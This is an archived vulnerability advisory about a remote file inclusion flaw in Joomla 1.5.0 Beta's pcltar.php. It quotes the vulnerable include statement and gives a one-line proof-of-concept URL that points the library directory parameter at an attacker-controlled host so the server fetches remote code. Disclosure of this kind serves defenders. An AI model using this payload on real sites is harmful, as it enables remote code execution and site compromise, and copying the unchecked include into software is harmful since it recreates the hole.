TUCoPS :: Web :: CMS / Portals :: tb10567.htm

Joomla 1.5.0 Beta remote file include
Remote file inclusion in Joomla 1.5.0 Beta
Remote file inclusion in Joomla 1.5.0 Beta


Hi,
Joomla! 1.5.0 is in Beta version and "should NOT to be used for `live`
or `production` sites."
Joomla 1.0.12 has a good security but it seems that Joomla 1.5.0 doesnt
have a good security approach. Anyway, there is a remote file inclusion
in Joomla 1.5.0 Beta :

File /libraries/pcl/pcltar.php, Line 74 :
  if (!defined("PCLERROR_LIB"))
  {
	include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension);
  }

POC : http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/? 

The original advisory (in Persian) is located at :
http://www.hackers.ir/advisories/joomla.html 


- Omid

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH